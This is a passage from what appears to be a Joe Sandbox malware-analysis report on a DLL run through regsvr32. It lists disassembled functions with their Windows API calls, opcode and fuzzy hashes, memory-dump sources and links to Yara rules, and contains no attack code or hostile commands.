                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 4271482742-0
                                                                                                          • Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
                                                                                                          • Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
                                                                                                          • Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Fputc$H_prolog3_
                                                                                                          • String ID:
                                                                                                          • API String ID: 2569218679-3916222277
                                                                                                          • Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
                                                                                                          • Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
                                                                                                          • Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 100286DC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                          • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                          • API String ID: 3274081130-63838506
                                                                                                          • Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
                                                                                                          • Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
                                                                                                          • Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10037AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___BuildCatchObject.LIBCMT ref: 10037AF8
                                                                                                            • Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89
                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 10037B0F
                                                                                                          • ___FrameUnwindToState.LIBCMT ref: 10037B1D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 2163707966-1018135373
                                                                                                          • Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
                                                                                                          • Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
                                                                                                          • Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                          • Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
                                                                                                          • Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
                                                                                                          • Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031BF
                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100031EB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 1452528299-0
                                                                                                          • Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
                                                                                                          • Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
                                                                                                          • Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10043377
                                                                                                          • _fgetc.LIBCMT ref: 100434AD
                                                                                                            • Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3
                                                                                                          • _memcpy_s.LIBCMT ref: 10043472
                                                                                                          • _ungetc.LIBCMT ref: 100434F8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                          • String ID:
                                                                                                          • API String ID: 9762108-0
                                                                                                          • Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
                                                                                                          • Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
                                                                                                          • Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __msize_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1288803200-0
                                                                                                          • Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
                                                                                                          • Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
                                                                                                          • Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$__cftof
                                                                                                          • String ID:
                                                                                                          • API String ID: 887240167-0
                                                                                                          • Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
                                                                                                          • Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
                                                                                                          • Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100231B0
                                                                                                          • LockResource.KERNEL32(00000000), ref: 100231C2
                                                                                                          • FreeResource.KERNEL32(00000000), ref: 10023210
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
                                                                                                          • Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 100217B5
                                                                                                            • Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4
                                                                                                          • __strdup.LIBCMT ref: 100217D7
                                                                                                          • GetCurrentThread.KERNEL32 ref: 10021804
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 1002180D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                          • String ID:
                                                                                                          • API String ID: 4206445780-0
                                                                                                          • Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
                                                                                                          • Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Capture
                                                                                                          • String ID:
                                                                                                          • API String ID: 1665607226-0
                                                                                                          • Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
                                                                                                          • Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002ABD3, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
                                                                                                          • swprintf.LIBCMT ref: 1002AC34
                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 22681860-0
                                                                                                          • Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
                                                                                                          • Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027839, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32 ref: 10027846
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027859
                                                                                                            • Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0
                                                                                                          • GetTopWindow.USER32(?), ref: 10027889
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670549584.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670541372.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670611644.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670619699.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670625265.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670649680.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670654366.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670659647.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
